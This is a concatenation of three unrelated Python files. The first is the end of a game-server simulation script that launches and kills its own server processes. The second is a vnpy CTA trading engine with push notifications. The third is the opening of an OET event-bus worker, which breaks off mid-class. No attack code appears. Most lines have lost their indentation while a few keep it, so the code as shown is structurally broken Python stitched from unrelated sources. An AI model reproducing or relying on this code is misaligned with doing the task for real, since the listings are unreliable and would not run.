if event.eventType == emulation.GTAEventsReader.SERVER_REMOVE:
if event.playerId == MASTER_SERVER:
thread = Thread(target=killServer, args=(event, MASTER_NODE_SERVER_NAME,))
else:
thread = Thread(target=killServer, args=(event, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip(),))
thread.start()
# if event.eventType == emulation.GTAEventsReader.SERVER_ADD:
#
# if event.playerId == MASTER_SERVER:
# addServer(event, serverApp, configFile, MASTER_NODE_SERVER_NAME, base_port)
# else:
# slave_port = base_port + port_offset * int(event.playerId)
# addServer(event, serverApp, configFile, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip(), str(slave_port))
# else:
# if event.eventType == emulation.GTAEventsReader.SERVER_REMOVE:
# if event.playerId == MASTER_SERVER:
# killServer(event, MASTER_NODE_SERVER_NAME)
# else:
# killServer(event, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip())
# else:
# logger.error("Server Event for" + event.playerId + " not identified")
else:
if(numSlaveServers is not None):
# Starting the base server
# command line to start the base server: python ../server/app.py --log-prefix player_id
proc = subprocess.Popen([sys.executable, serverApp, '--config', configFile, '--log-prefix', 'master_node', '--port', str(base_port)])
if proc.pid > 0:
logger.info("Base Server successfully added. Process Id: " + str(proc.pid))
                serverProcesses[MASTER_NODE_SERVER_NAME] = proc.pid
else:
logger.error("Error while loading the base server. Simulation will be aborted.")
return
time.sleep(SIMULATION_SERVERS_WARMUP_TIME)
# Initializing the slave servers for simulation
i = 1
while i <= numSlaveServers:
slave_port = base_port + port_offset*i
                proc = subprocess.Popen([sys.executable, serverApp, '--config', configFile, '--log-prefix', 'slave_' + str(i), '--port', str(slave_port)])
                if proc.pid > 0:
                    logger.info("Slave Server " + str(i) + " successfully added. Process Id: " + str(proc.pid))
                    serverProcesses[SLAVE_NODE_SERVER_NAME_PREFIX + str(i)] = proc.pid
else:
logger.error("Error while loading slave server " + str(i) + ".")
i += 1
time.sleep(SIMULATION_SERVERS_WARMUP_TIME)
else:
logger.error("The number of slave servers or a list of server events was not provided, "
"so no servers will be added to the simulation.")
return
# This kills the process of a given server used in the simulation.
# Input: event_details: the event that triggered the removal (its timeStamp is used as a delay).
#        serverName: the name of the server whose process should be killed.
# Output: none.
def killServer(event_details, serverName):
time.sleep(event_details.timeStamp)
if serverProcesses[serverName] is not None:
if not runningWindows:
commandLine = "kill -9 " + str(serverProcesses[serverName])
else:
#Killing the process using a Windows command
commandLine = "taskkill /f /pid " + str(serverProcesses[serverName])
logger.info("Removing the server process:" + str(serverProcesses[serverName]))
# Executing the command to kill the respective process.
os.system(commandLine)
serverProcesses[serverName] = None
return
# This kills all server processes used for the simulation.
# Input: none (uses the global serverProcesses mapping and the runningWindows flag).
# Output: none.
def killServers():
with serverLock:
numberOfProcesses = len(serverProcesses)
if numberOfProcesses > 0:
        for serverName, serverPid in serverProcesses.items():
            # Skip servers that were already removed during the simulation.
            if serverPid is None:
                continue
            if not runningWindows:
                commandLine = "kill -9 " + str(serverPid)
            else:
                # Killing the process using a Windows command
                commandLine = "taskkill /f /pid " + str(serverPid)
            logger.info("Removing the server process: " + str(serverPid))
            # Executing the command to kill the respective process.
            os.system(commandLine)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Simulation")
# Parameters related to the simulation
parser.add_argument("--elap-time", dest="simulationElapsedTimeInSeconds", default=30)
parser.add_argument("--delayBetweenEvents", dest="timeBetweenEvents", default=0.5)
parser.add_argument("--gta-file", dest="gtaFilename", default='WoWSession_Node_Player_Fixed_Dynamic_reduced.zip')
# Parameters related to the servers used in the simulation
parser.add_argument("--base-port", dest="basePort", default=7000)
parser.add_argument("--port-offset", dest="portOffset",default=1000)
parser.add_argument("--num-slave-servers", dest="numSlaveServers", default=0)
parser.add_argument("--server-event-file", dest="serverEventFilename")
parser.add_argument("--server-config", dest="serverConfig", default="./test/das_config.json")
# Example of parameters to invoke main --elap-time 15 --delayBetweenEvents 1 --gta-file WoWSession_Node_Player_Fixed_Dynamic_reduced.zip --server-event-file Server_Connectons_Disconnections.zip
args = parser.parse_args()
init_logger("log/simulation_{}.log".format(time.time()))
# Assigning the parameters received in the command line to the variables which will be used for the simulation
simulationElapsedTimeInSeconds = int(args.simulationElapsedTimeInSeconds)
timeBetweenEvents = float(args.timeBetweenEvents)
gtaFilename = args.gtaFilename
base_port = int(args.basePort)
port_offset = int(args.portOffset)
numSlaveServers = int(args.numSlaveServers)
serverEventFilename = args.serverEventFilename
configurationFile = args.serverConfig
# This list will contain pairs of players and the associated process.
global playersAndProcesses
playersAndProcesses = {}
# List of processes related to the servers used in the simulation (master + slaves)
global serverProcesses
serverProcesses = {}
# This lock is used to implement concurrency control on the list of players and processes which will be shared
    # across multiple threads.
lock = Lock()
serverLock = Lock()
runningWindows = False
if os.name == 'nt':
runningWindows = True
    fileDir = os.path.dirname(os.path.realpath(__file__))
# Depending on the OS in which the simulation is running the way in which the client and server are invoked is
# different.
if not runningWindows:
clientAppLocation = os.path.join(fileDir, LOCATION_CLIENT_APP_LINUX)
serverAppLocation = os.path.join(fileDir, LOCATION_SERVER_APP_LINUX)
else:
# Windows file structure
clientAppLocation = os.path.join(fileDir, LOCATION_CLIENT_APP_WINDOWS)
serverAppLocation = os.path.join(fileDir, LOCATION_SERVER_APP_WINDOWS)
# List of events still considering the timestamps read from the GTA file
listOfEvents = emulation.GTAEventsReader.LoadEventsFromFile(gtaFilename, emulation.GTAEventsReader.MODE_PLAYERS)
# Normalize the timeStamps of the Login/Logout events using the given simulation's elapsed time.
listOfNormalizedPlayerEvents = emulation.GTAEventsReader.NormalizeEvents(listOfEvents, simulationElapsedTimeInSeconds)
logger.info("Total number of Login/Logout events: " + str(len(listOfNormalizedPlayerEvents)))
# List of server events
    listOfEvents = None
    listOfNormalizedServerEvents = None
listOfEvents = emulation.GTAEventsReader.LoadEventsFromFile(serverEventFilename, emulation.GTAEventsReader.MODE_SERVERS)
if listOfEvents is not None:
# Normalize the timeStamps of the server events using the given simulation's elapsed time.
listOfNormalizedServerEvents = emulation.GTAEventsReader.NormalizeEvents(listOfEvents, simulationElapsedTimeInSeconds)
logger.info("Total number of server events: " + str(len(listOfNormalizedServerEvents)))
logger.info("Starting the simulation.")
logger.info("Initializing servers.")
triggerServerEvents(serverAppLocation, configurationFile, base_port, port_offset, numSlaveServers, listOfNormalizedServerEvents)
logger.info("Triggering events.")
triggerJoinLeaveEvents(listOfNormalizedPlayerEvents, lock, clientAppLocation, timeBetweenEvents)
if listOfEvents is None:
logger.info("List of server events not used - killing the processes related to the servers.")
        killServers()
print("This is the end of the simulation.")
|
engine.py
|
""""""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread, Lock
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine, EVENT_TIMER
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
HistoryRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol, round_to
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_NOTIFY,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EVENT_DAILY_CLOSE,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
import jpush
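# Maps broker order statuses onto the local stop-order lifecycle states used by the CTA engine.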
STOP_STATUS_MAP = {
Status.SUBMITTING: StopOrderStatus.WAITING,
Status.NOTTRADED: StopOrderStatus.WAITING,
Status.PARTTRADED: StopOrderStatus.TRIGGERED,
Status.ALLTRADED: StopOrderStatus.TRIGGERED,
Status.CANCELLED: StopOrderStatus.CANCELLED,
Status.REJECTED: StopOrderStatus.CANCELLED
}
class CtaEngine(BaseEngine):
""""""
engine_type = EngineType.LIVE # live trading engine
setting_filename = "ib_cta_strategy_setting.json"
data_filename = "ib_cta_strategy_data.json"
daily_close_filename = "dail_close_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(CtaEngine, self).__init__(
main_engine, event_engine, APP_NAME)
self.strategy_setting = {} # strategy_name: dict
self.strategy_data = {} # strategy_name: dict
        self.classes = {}  # class_name: strategy_class
self.strategies = {} # strategy_name: strategy
self.symbol_strategy_map = defaultdict(
list) # vt_symbol: strategy list
self.orderid_strategy_map = {} # vt_orderid: strategy
self.strategy_orderid_map = defaultdict(
set) # strategy_name: orderid list
# self.stop_order_count = 0 # for generating stop_orderid
# self.stop_orders = {} # stop_orderid: stop_order
self.init_thread = None
self.init_queue = Queue()
self.vt_tradeids = set() # for filtering duplicate trade
self.offset_converter = OffsetConverter(self.main_engine)
self.notifier = None
self._lock = Lock()
self.daily_close_setting = {}
self._timer_count = 0
def init_engine(self):
"""
"""
self.init_notifier()
self.load_strategy_class()
self.load_strategy_setting()
self.load_strategy_data()
self.register_event()
self.write_log("CTA策略引擎初始化成功")
def close(self):
""""""
self.stop_all_strategies()
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_CTA_NOTIFY, self.process_notify_event)
self.event_engine.register(EVENT_DAILY_CLOSE, self.process_daily_close_event)
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def init_notifier(self):
from vnpy.trader.setting import get_settings
push_settings = get_settings('notification.')
if push_settings:
krPush = jpush.JPush(push_settings['app_key'], push_settings['master_secret'])
self.notifier = krPush.create_push()
self.notifier.audience = jpush.all_
self.notifier.platform = jpush.all_
def process_tick_event(self, event: Event):
""""""
tick = event.data
strategies = self.symbol_strategy_map[tick.vt_symbol]
if not strategies:
return
# self.check_stop_order(tick)
for strategy in strategies:
if strategy.inited:
self.call_strategy_func(strategy, strategy.on_tick, tick)
def process_order_event(self, event: Event):
""""""
order = event.data
self.offset_converter.update_order(order)
strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
if not strategy:
return
# Remove vt_orderid if order is no longer active.
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if order.vt_orderid in vt_orderids and not order.is_active():
vt_orderids.remove(order.vt_orderid)
# For server stop order, call strategy on_stop_order function
if order.type == OrderType.STOP:
so = StopOrder(
vt_symbol=order.vt_symbol,
direction=order.direction,
offset=order.offset,
price=order.price,
volume=order.volume,
stop_orderid=order.vt_orderid,
strategy_name=strategy.strategy_name,
status=STOP_STATUS_MAP.get(order.status, ""),
vt_orderids=[order.vt_orderid],
)
self.call_strategy_func(strategy, strategy.on_stop_order, so)
# Call strategy on_order function
self.call_strategy_func(strategy, strategy.on_order, order)
self.write_log(f'ORDER[{order.type.value}]<{order.vt_orderid}>:#{order.vt_symbol} {order.direction.value} {order.volume}@{order.price} -- {order.status}', strategy)
def process_trade_event(self, event: Event):
""""""
trade = event.data
# Filter duplicate trade push
if trade.vt_tradeid in self.vt_tradeids:
return
self.vt_tradeids.add(trade.vt_tradeid)
self.offset_converter.update_trade(trade)
strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
if not strategy:
return
# Update strategy pos before calling on_trade method
if trade.direction == Direction.LONG:
strategy.pos += trade.volume
else:
strategy.pos -= trade.volume
self.call_strategy_func(strategy, strategy.on_trade, trade)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
database_manager.save_trade_data([trade], strategy.strategy_name)
# Update GUI
self.put_strategy_event(strategy)
self.write_log(f'TRADE<{trade.vt_tradeid}>:#{trade.vt_symbol} {trade.direction.value} {trade.volume}@{trade.price}', strategy)
def process_position_event(self, event: Event):
""""""
position = event.data
self.offset_converter.update_position(position)
def process_notify_event(self, event: Event):
notification = event.data.msg
if self.notifier:
self.notifier.notification = jpush.notification(alert=notification)
try:
response = self.notifier.send()
except jpush.common.Unauthorized as unauth:
self.write_log(f'KRPushUnauthorized: {unauth}')
except jpush.common.APIConnectionException as conne:
self.write_log(f'KRPushAPIConnectionException: {conne}')
except jpush.common.JPushFailure as pushFail:
self.write_log(f'KRPushFailure: {pushFail}')
except Exception as e:
self.write_log(f'KRPushException: {e}')
else:
self.write_log(f'KRPush未配置,无法推送->{notification}')
def process_daily_close_event(self, event: Event):
print(f'日内平仓测试{event}')
# self.close_all_strategies_pos()
def process_timer_event(self, event: Event):
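        # Called on every EVENT_TIMER tick. Every third tick, if the current time falls inside the
        # 30-35 second window before the configured daily close time, an EVENT_DAILY_CLOSE is emitted.
        # Every 600 ticks the daily close setting is reloaded via load_daily_close_setting().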
self._timer_count += 1
if self._timer_count%3 == 0 and \
self.daily_close_setting and \
timedelta(seconds=-35) < datetime.now() - self.daily_close_setting['time'] < timedelta(seconds=-30):
self.event_engine.put(Event(EVENT_DAILY_CLOSE))
if self._timer_count < 600:
return
self._timer_count = 0
self.load_daily_close_setting()
def send_server_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
type: OrderType,
):
"""
Send a new order to server.
"""
# Create request and send order.
original_req = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
offset=offset,
type=type,
price=price,
volume=volume,
orderRef=strategy.strategy_name
)
# Convert with offset converter
# req_list = self.offset_converter.convert_order_request(original_req, lock)
req_list = [original_req]
# Send Orders
vt_orderids = []
for req in req_list:
vt_orderid = self.main_engine.send_order(
req, contract.gateway_name)
# Check if sending order successful
if not vt_orderid:
continue
vt_orderids.append(vt_orderid)
self.offset_converter.update_order_request(req, vt_orderid)
# Save relationship between orderid and strategy.
self.orderid_strategy_map[vt_orderid] = strategy
self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)
return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
)
def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
Cancel existing order by vt_orderid.
"""
order = self.main_engine.get_order(vt_orderid)
if not order:
self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
return
req = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def send_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool
):
"""
"""
contract = self.main_engine.get_contract(strategy.vt_symbol)
if not contract:
self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
return ""
# Round order price and volume to nearest incremental value
price = round_to(price, contract.pricetick)
volume = round_to(volume, contract.min_volume)
if stop:
return self.send_server_stop_order(strategy, contract, direction, offset, price, volume)
else:
return self.send_limit_order(strategy, contract, direction, offset, price, volume)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
def get_engine_type(self):
""""""
return self.engine_type
def load_bar(
self,
vt_symbol: str,
days: int,
interval: Interval,
callback: Callable[[BarData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"load_bar失败,找不到合约:{vt_symbol}")
return ""
req = HistoryRequest(symbol, exchange, start=start, end=None, interval=interval)
bars = self.main_engine.query_history(req, contract.gateway_name)
for bar in bars:
callback(bar)
def load_tick(
self,
vt_symbol: str,
days: int,
callback: Callable[[TickData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
ticks = database_manager.load_tick_data(
symbol=symbol,
exchange=exchange,
start=start,
end=end,
)
for tick in ticks:
callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
def add_strategy(
self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
):
"""
Add a new strategy.
"""
if strategy_name in self.strategies:
self.write_log(f"创建策略失败,存在重名{strategy_name}")
return
strategy_class = self.classes.get(class_name, None)
if not strategy_class:
self.write_log(f"创建策略失败,找不到策略类{class_name}")
return
strategy = strategy_class(self, strategy_name, vt_symbol, setting)
self.strategies[strategy_name] = strategy
# Add vt_symbol to strategy map.
strategies = self.symbol_strategy_map[vt_symbol]
strategies.append(strategy)
# Update to setting file.
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def init_strategy(self, strategy_name: str):
"""
Init a strategy.
"""
self.init_queue.put(strategy_name)
if not self.init_thread:
self.init_thread = Thread(target=self._init_strategy)
self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
def start_strategy(self, strategy_name: str):
"""
Start a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿重复操作")
return
self.write_log("策略启动", strategy)
self.call_strategy_func(strategy, strategy.on_start)
strategy.trading = True
self.put_strategy_event(strategy)
def recover_strategy(self, strategy_name: str):
"""
Recover a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}恢复失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿做恢复操作")
return
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
variables = {}
if data:
for name in strategy.variables:
if name in ['inited', 'trading']:
continue
variables[name] = data.get(name, None)
self.recover_orders_and_trades()
self.write_log("策略恢复", strategy)
self.call_strategy_func(strategy, strategy.on_recover, variables)
self.put_strategy_event(strategy)
def stop_strategy(self, strategy_name: str):
"""
Stop a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
self.write_log("策略停止", strategy)
# Call on_stop function of the strategy
self.call_strategy_func(strategy, strategy.on_stop)
# Change trading status of strategy to False
strategy.trading = False
# Cancel all orders of the strategy
self.cancel_all(strategy)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def close_strategy_pos(self, strategy_name: str):
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
# Cancel all orders of the strategy
self.cancel_all(strategy)
if strategy.pos != 0:
tick = self.main_engine.get_tick(strategy.vt_symbol)
if not tick:
self.write_log(f"不存在Tick,请先订阅", strategy)
return
            # Use an aggressively priced limit order (crossing well through the
            # last price) so the closing order fills immediately.
            if strategy.pos > 0:
                strategy.send_order(Direction.SHORT, Offset.CLOSE, tick.last_price - 15, strategy.pos)
            else:
                strategy.send_order(Direction.LONG, Offset.CLOSE, tick.last_price + 15, -strategy.pos)
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def edit_strategy(self, strategy_name: str, setting: dict):
"""
Edit parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
strategy.update_setting(setting)
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def modify_strategy_data(self, strategy_name: str, key: str, value):
"""
        Change a parameter or variable of a strategy.
"""
strategy = self.strategies[strategy_name]
if not hasattr(strategy, key):
self.write_log(f"策略{strategy.strategy_name}不存在字段:{key}")
return
_type = type(getattr(strategy, key))
with self._lock:
try:
setattr(strategy, key, _type(value))
except Exception as e:
self.write_log(f"策略{strategy.strategy_name}设置{key}错误--{e}")
self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
def load_strategy_class(self):
"""
Load strategy class from source code.
"""
path1 = Path(__file__).parent.joinpath("strategies")
self.load_strategy_class_from_folder(
path1, "vnpy.app.ib_cta_strategy.strategies")
path2 = Path.cwd().joinpath("strategies")
self.load_strategy_class_from_folder(path2, "strategies")
def recover_orders_and_trades(self):
"""
        Recover strategy order and trade mappings from the gateway's open orders and trade records.
"""
orders = self.main_engine.get_all_orders()
for o in orders:
if o.orderRef in self.strategies:
self.orderid_strategy_map[o.vt_orderid] = self.strategies[o.orderRef]
self.strategy_orderid_map[o.orderRef].add(o.vt_orderid)
trades = self.main_engine.get_all_trades()
for t in trades:
if t.orderRef in self.strategies:
database_manager.save_trade_data([t], t.orderRef)
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_data(self):
"""
Load strategy data from json file.
"""
self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def recover_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.recover_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
def close_all_strategies_pos(self):
"""
"""
for strategy_name in self.strategies.keys():
self.close_strategy_pos(strategy_name)
def load_strategy_setting(self):
"""
Load setting file.
"""
self.strategy_setting = load_json(self.setting_filename)
for strategy_name, strategy_config in self.strategy_setting.items():
self.add_strategy(
strategy_config["class_name"],
strategy_name,
strategy_config["vt_symbol"],
strategy_config["setting"]
)
def load_daily_close_setting(self):
setting = load_json(self.daily_close_filename)
        # The setting file is expected to contain {"time": [hour, minute]}.
        if 'time' in setting:
            try:
                close_time = datetime.now().replace(hour=setting['time'][0], minute=setting['time'][1], second=0)
                # Store a dict so process_timer_event can read self.daily_close_setting['time'].
                self.daily_close_setting = {'time': close_time}
            except Exception as e:
                self.write_log(f"配置日内平仓错误:{e}")
        else:
            self.daily_close_setting = {}
def update_strategy_setting(self, strategy_name: str, setting: dict):
"""
Update setting file.
"""
strategy = self.strategies[strategy_name]
self.strategy_setting[strategy_name] = {
"class_name": strategy.__class__.__name__,
"vt_symbol": strategy.vt_symbol,
"setting": setting,
}
save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
def write_log(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_LOG, data=log)
self.event_engine.put(event)
def send_notification(self, msg: str, strategy: CtaTemplate = None):
"""
        Create cta engine notification event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_NOTIFY, data=log)
self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
|
main.py
|
import logging.config
import logging.handlers
import threading
from typing import List
import requests
from flask import request
from pubsub import pub
from oet.event import topics
from oet.mptools import (
EventMessage,
MainContext,
MPQueue,
QueueProcWorker,
default_signal_handler,
init_signals,
)
from oet.procedure.application import restserver
from oet.procedure.application.application import (
PrepareProcessCommand,
ScriptExecutionService,
StartProcessCommand,
StopProcessCommand,
)
class EventBusWorker(QueueProcWorker):
"""
EventBusWorker converts external inter-process pub/sub messages to and
from local intra-process pubsub messages.
EventBusWorker uses the QueueProcWorker's 'work queue' as an inbox for
pub/sub EventMessages sent by other ProcWorkers. EventMessages received
on this queue are rebroadcast locally as pypubsub messages. Likewise, the
EventBusWorker listens to all pypubsub messages broadcast locally,
    converts them to inter-process EventMessages, and puts them on the 'main'
queue for transmission to other EventBusWorkers.
"""
def republish(self, topic: pub.Topic = pub.AUTO_TOPIC, **kwargs) -> None:
"""
Republish a local event over the inter-process event bus.
:param topic: message topic, set automatically by pypubsub
:param kwargs: any metadata associated with pypubsub message
:return:
"""
# avoid infinite loop - do not republish external events
try:
msg_src = kwargs.pop("msg_src")
except KeyError:
# No message source = virgin event published on pypubsub
msg_src = self.name
# ... but if this is a local message (message source = us), send it
# out to the main queue and hence on to other EventBusWorkers
if msg_src == self.name:
# Convert pypubsub event to the equivalent mptools EventMessage
msg = EventMessage(
self.name, "PUBSUB", dict(topic=topic.name, kwargs=kwargs)
)
            # note that this is a blocking put. If the queue is full, this call
# will block until the queue has room to accept the message
self.log(logging.DEBUG, "Queueing internal event: %s", msg)
self.event_q.put(msg)
def startup(self) -> None:
"""
Connect republishing function to pypubsub.
"""
super().startup()
# Request republish method be called for all pypubsub messages
pub.subscribe(self.republish, pub.ALL_TOPICS)
def shutdown(self) -> None:
"""
Disconnect republishing function from pypubsub
"""
super().shutdown()
# Technically, unsubscribing is unnecessary as pypubsub holds weak
# references to listeners and automatically unsubscribes listeners
# that have been deleted
pub.unsubscribe(self.republish, pub.ALL_TOPICS)
def main_func(self, evt: EventMessage) -> None:
"""
Republish external pub/sub message locally.
QueueProcWorker ensures that main_func is called for every item in the
work queue. This function takes that work item - the external pub/sub
EventMessage - and rebroadcasts it locally as a pypubsub message.
:param evt: pub/sub EventMessage to broadcast locally
"""
# avoid infinite loop - do not reprocess events that originated from us
if evt.msg_src != self.name:
self.log(logging.DEBUG, "Republishing external event: %s", evt)
payload = evt.msg
topic = payload["topic"]
pub.sendMessage(topic, msg_src=evt.msg_src, **payload["kwargs"])
else:
self.log(logging.DEBUG, "Discarding internal event: %s", evt)
def send_message(self, topic, **kwargs):
pub.sendMessage(topic, msg_src=self.name, **kwargs)
class FlaskWorker(EventBusWorker):
"""
FlaskWorker is an EventBusWorker that runs Flask.
By extending EventBusWorker, Flask functions can use pypubsub to subscribe
